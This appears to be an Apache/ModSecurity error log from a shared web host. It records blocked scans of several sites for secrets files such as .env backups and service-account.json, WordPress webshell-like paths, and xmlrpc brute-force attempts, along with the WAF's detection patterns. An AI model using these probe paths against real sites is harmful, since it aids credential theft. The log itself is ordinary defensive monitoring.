[Tue May 26 13:03:34.289217 2026] [security2:error] [pid 470766:tid 470918] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "thedebateafrica.org"] [uri "/index.php"] [unique_id "ahVMzOjO_W1DqEcFHQ73JQAAABY"]
[Tue May 26 13:03:34.289814 2026] [security2:error] [pid 470766:tid 470973] [client 46.151.182.172:60928] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ728AAAAE0"]
[Tue May 26 13:03:34.393560 2026] [security2:error] [pid 470766:tid 471004] [client 45.45.237.225:38498] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "athelstan.org.in"] [uri "/.env.bak"] [unique_id "ahVMzujO_W1DqEcFHQ73mQAAAGw"]
[Tue May 26 13:03:34.430543 2026] [security2:error] [pid 470766:tid 471018] [client 45.45.237.225:38494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "athelstan.org.in"] [uri "/.env.backup"] [unique_id "ahVMzujO_W1DqEcFHQ73nAAAAHo"]
[Tue May 26 13:03:34.498773 2026] [security2:error] [pid 470766:tid 471011] [client 45.45.237.225:38532] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "athelstan.org.in"] [uri "/appsettings.json"] [unique_id "ahVMzujO_W1DqEcFHQ73qQAAAHM"]
[Tue May 26 13:03:34.498893 2026] [security2:error] [pid 470766:tid 471011] [client 45.45.237.225:38532] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "athelstan.org.in"] [uri "/appsettings.json"] [unique_id "ahVMzujO_W1DqEcFHQ73qQAAAHM"]
[Tue May 26 13:03:34.499649 2026] [security2:error] [pid 470766:tid 470912] [client 45.45.237.225:38620] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "athelstan.org.in"] [uri "/service-account.json"] [unique_id "ahVMzujO_W1DqEcFHQ73sAAAABA"]
[Tue May 26 13:03:34.499731 2026] [security2:error] [pid 470766:tid 470912] [client 45.45.237.225:38620] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "athelstan.org.in"] [uri "/service-account.json"] [unique_id "ahVMzujO_W1DqEcFHQ73sAAAABA"]
[Tue May 26 13:03:34.587575 2026] [security2:error] [pid 470766:tid 470940] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMzujO_W1DqEcFHQ73hQAAACw"]
[Tue May 26 13:03:34.835085 2026] [security2:error] [pid 470766:tid 470958] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "thedebateafrica.org"] [uri "/index.php"] [unique_id "ahVMzujO_W1DqEcFHQ73xAAAAD4"]
[Tue May 26 13:03:34.835673 2026] [security2:error] [pid 470766:tid 470896] [client 46.151.182.172:61405] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "thedebateafrica.org"] [uri "/"] [unique_id "ahVMzujO_W1DqEcFHQ73wAAAAAA"]
[Tue May 26 13:03:34.842320 2026] [security2:error] [pid 470766:tid 470967] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "thedebateafrica.org"] [uri "/index.php"] [unique_id "ahVMzujO_W1DqEcFHQ73wwAAAEc"]
[Tue May 26 13:03:34.842843 2026] [security2:error] [pid 470766:tid 471021] [client 46.151.182.172:61404] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "thedebateafrica.org"] [uri "/"] [unique_id "ahVMzujO_W1DqEcFHQ73vwAAAH0"]
[Tue May 26 13:03:34.859837 2026] [security2:error] [pid 470766:tid 470970] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "tedxnutm.org.ng"] [uri "/index.php"] [unique_id "ahVMzujO_W1DqEcFHQ73jQAAAEo"]
[Tue May 26 13:03:35.007119 2026] [security2:error] [pid 470766:tid 470994] [client 45.45.237.225:38706] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-grandranks.php"] [unique_id "ahVMz-jO_W1DqEcFHQ731AAAAGI"]
[Tue May 26 13:03:35.007136 2026] [security2:error] [pid 470766:tid 470975] [client 45.45.237.225:38650] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-smhonors.php"] [unique_id "ahVMz-jO_W1DqEcFHQ731gAAAE8"]
[Tue May 26 13:03:35.007184 2026] [security2:error] [pid 470766:tid 470927] [client 45.45.237.225:38630] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-grandofficers.php"] [unique_id "ahVMz-jO_W1DqEcFHQ731QAAAB8"]
[Tue May 26 13:03:35.007224 2026] [security2:error] [pid 470766:tid 471023] [client 45.45.237.225:38752] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-about-history.php"] [unique_id "ahVMz-jO_W1DqEcFHQ731wAAAH8"]
[Tue May 26 13:03:35.007285 2026] [security2:error] [pid 470766:tid 470999] [client 45.45.237.225:38580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/index.php"] [unique_id "ahVMz-jO_W1DqEcFHQ732AAAAGc"]
[Tue May 26 13:03:35.007592 2026] [security2:error] [pid 470766:tid 471022] [client 45.45.237.225:38742] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "athelstan.org.in"] [uri "/athelstan-downloads-statutes.php"] [unique_id "ahVMz-jO_W1DqEcFHQ733AAAAH4"]
[Tue May 26 13:03:35.007669 2026] [security2:error] [pid 470766:tid 471022] [client 45.45.237.225:38742] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "athelstan.org.in"] [uri "/athelstan-downloads-statutes.php"] [unique_id "ahVMz-jO_W1DqEcFHQ733AAAAH4"]
[Tue May 26 13:03:35.007779 2026] [security2:error] [pid 470766:tid 470994] [client 45.45.237.225:38512] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-about-overview.php"] [unique_id "ahVMz-jO_W1DqEcFHQ732wAAAGI"]
[Tue May 26 13:03:35.007879 2026] [security2:error] [pid 470766:tid 470902] [client 45.45.237.225:38582] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-provincesandcourts.php"] [unique_id "ahVMz-jO_W1DqEcFHQ732QAAAAY"]
[Tue May 26 13:03:35.007892 2026] [security2:error] [pid 470766:tid 470975] [client 45.45.237.225:38672] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-downloads-circulars-grand.php"] [unique_id "ahVMz-jO_W1DqEcFHQ733QAAAE8"]
[Tue May 26 13:03:35.008429 2026] [security2:error] [pid 470766:tid 470898] [client 45.45.237.225:38542] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-about-india.php"] [unique_id "ahVMz-jO_W1DqEcFHQ732gAAAAI"]
[Tue May 26 13:03:35.041634 2026] [security2:error] [pid 470766:tid 471014] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "friendsalongtheway.net"] [uri "/index.php"] [unique_id "ahVMzejO_W1DqEcFHQ73VwAAAHY"]
[Tue May 26 13:03:35.043461 2026] [security2:error] [pid 470766:tid 470982] [client 46.151.182.172:61028] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "friendsalongtheway.net"] [uri "/"] [unique_id "ahVMzejO_W1DqEcFHQ73VQAAAFY"]
[Tue May 26 13:03:35.082938 2026] [security2:error] [pid 470766:tid 470919] [client 45.45.237.225:38570] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-downloads-circulars-scarletmantle.php"] [unique_id "ahVMz-jO_W1DqEcFHQ734gAAABc"]
[Tue May 26 13:03:35.083258 2026] [security2:error] [pid 470766:tid 470976] [client 45.45.237.225:38666] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-contact.php"] [unique_id "ahVMz-jO_W1DqEcFHQ734wAAAFA"]
[Tue May 26 13:03:35.083287 2026] [security2:error] [pid 470766:tid 470974] [client 45.45.237.225:38494] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-website-privacy.php"] [unique_id "ahVMz-jO_W1DqEcFHQ735wAAAE4"]
[Tue May 26 13:03:35.083496 2026] [security2:error] [pid 470766:tid 470935] [client 45.45.237.225:38520] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-regalia.php"] [unique_id "ahVMz-jO_W1DqEcFHQ736AAAACc"]
[Tue May 26 13:03:35.083548 2026] [security2:error] [pid 470766:tid 470959] [client 45.45.237.225:38720] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-downloads-summons.php"] [unique_id "ahVMz-jO_W1DqEcFHQ735AAAAD8"]
[Tue May 26 13:03:35.083709 2026] [security2:error] [pid 470766:tid 470993] [client 45.45.237.225:38556] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-downloads-forms.php"] [unique_id "ahVMz-jO_W1DqEcFHQ735gAAAGE"]
[Tue May 26 13:03:35.083886 2026] [security2:error] [pid 470766:tid 470960] [client 45.45.237.225:38676] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athlestan-faq.php"] [unique_id "ahVMz-jO_W1DqEcFHQ736wAAAEA"]
[Tue May 26 13:03:35.083969 2026] [security2:error] [pid 470766:tid 470964] [client 45.45.237.225:38502] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-website-terms.php"] [unique_id "ahVMz-jO_W1DqEcFHQ736gAAAEQ"]
[Tue May 26 13:03:35.084142 2026] [security2:error] [pid 470766:tid 470938] [client 45.45.237.225:38694] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/athelstan-website-disclaimer.php"] [unique_id "ahVMz-jO_W1DqEcFHQ735QAAACo"]
[Tue May 26 13:03:35.132322 2026] [security2:error] [pid 470766:tid 470953] [client 46.151.182.172:61293] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "tedxnutm.org.ng"] [uri "/"] [unique_id "ahVMzujO_W1DqEcFHQ73igAAADk"]
[Tue May 26 13:03:35.168557 2026] [autoindex:error] [pid 470766:tid 470948] [client 45.45.237.225:38498] AH01276: Cannot serve directory /home2/svijakqj/athelstan.org.in/images/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://athelstan.org.in/images
[Tue May 26 13:03:35.525464 2026] [security2:error] [pid 470766:tid 470899] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "friendsalongtheway.net"] [uri "/index.php"] [unique_id "ahVMzejO_W1DqEcFHQ73WwAAAAM"]
[Tue May 26 13:03:35.526771 2026] [security2:error] [pid 470766:tid 470998] [client 46.151.182.172:61037] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "friendsalongtheway.net"] [uri "/"] [unique_id "ahVMzejO_W1DqEcFHQ73WAAAAGY"]
[Tue May 26 13:03:36.772815 2026] [security2:error] [pid 470766:tid 470935] [client 4.201.75.230:46060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-cron.php"] [unique_id "ahVM0OjO_W1DqEcFHQ74PgAAACc"]
[Tue May 26 13:03:37.003687 2026] [security2:error] [pid 470766:tid 471018] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM0OjO_W1DqEcFHQ74NwAAAHo"]
[Tue May 26 13:03:37.105744 2026] [security2:error] [pid 470766:tid 470908] [client 74.7.230.53:44586] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.premium.cagmedya.com"] [uri "/robots.txt"] [unique_id "ahVM0ejO_W1DqEcFHQ74UwAADCg"]
[Tue May 26 13:03:37.272832 2026] [security2:error] [pid 470766:tid 470957] [client 20.104.227.76:3039] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.drumstonemedia.com.md-74.webhostbox.net"] [uri "/wk/index.php"] [unique_id "ahVM0ejO_W1DqEcFHQ74XgAAAD0"]
[Tue May 26 13:03:38.727557 2026] [security2:error] [pid 470766:tid 470974] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM0ujO_W1DqEcFHQ74iwAAAE4"]
[Tue May 26 13:03:38.782800 2026] [security2:error] [pid 470766:tid 470959] [client 4.201.75.230:5519] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-headre.php"] [unique_id "ahVM0ujO_W1DqEcFHQ74ogAAAD8"]
[Tue May 26 13:03:40.457077 2026] [security2:error] [pid 470766:tid 470970] [client 4.201.75.230:5545] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-links-opml.php"] [unique_id "ahVM1OjO_W1DqEcFHQ746QAAAEo"]
[Tue May 26 13:03:41.939950 2026] [security2:error] [pid 470766:tid 471013] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM1ejO_W1DqEcFHQ75IAAAAHU"]
[Tue May 26 13:03:42.694640 2026] [security2:error] [pid 470766:tid 470973] [client 4.201.75.230:5521] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-load.php"] [unique_id "ahVM1ujO_W1DqEcFHQ75UwAAAE0"]
[Tue May 26 13:03:43.098459 2026] [security2:error] [pid 470766:tid 470873] [remote 88.198.216.95:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.216.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVM1ujO_W1DqEcFHQ75YAAABWo"]
[Tue May 26 13:03:43.588071 2026] [security2:error] [pid 470766:tid 470975] [client 157.20.138.61:62796] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVM1-jO_W1DqEcFHQ75fQAAAE8"]
[Tue May 26 13:03:43.588260 2026] [security2:error] [pid 470766:tid 470975] [client 157.20.138.61:62796] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVM1-jO_W1DqEcFHQ75fQAAAE8"]
[Tue May 26 13:03:44.121803 2026] [security2:error] [pid 470766:tid 471006] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM1-jO_W1DqEcFHQ75gwAAAG4"]
[Tue May 26 13:03:44.471927 2026] [ssl:error] [pid 470766:tid 470985] [client 98.84.1.175:43458] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname plenitudotonal.com provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 13:03:46.385964 2026] [security2:error] [pid 470766:tid 470919] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM2ejO_W1DqEcFHQ759QAAABc"]
[Tue May 26 13:03:47.232747 2026] [security2:error] [pid 470766:tid 470982] [client 4.201.75.230:5252] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-mail.php"] [unique_id "ahVM2-jO_W1DqEcFHQ76NAAAAFY"]
[Tue May 26 13:03:48.790268 2026] [security2:error] [pid 470766:tid 470997] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM3OjO_W1DqEcFHQ76gQAAAGU"]
[Tue May 26 13:03:49.510570 2026] [security2:error] [pid 470766:tid 470964] [client 4.201.75.230:5507] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-settings.php"] [unique_id "ahVM3ejO_W1DqEcFHQ76wQAAAEQ"]
[Tue May 26 13:03:49.768933 2026] [security2:error] [pid 470766:tid 470955] [client 104.194.132.199:57402] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.132.194.104.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVM3ejO_W1DqEcFHQ76yAAAADs"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 13:03:49.769118 2026] [security2:error] [pid 470766:tid 470955] [client 104.194.132.199:57402] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVM3ejO_W1DqEcFHQ76yAAAADs"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 13:03:50.508516 2026] [security2:error] [pid 470766:tid 470903] [client 104.194.132.199:57441] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVM3ujO_W1DqEcFHQ766QAAAAc"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
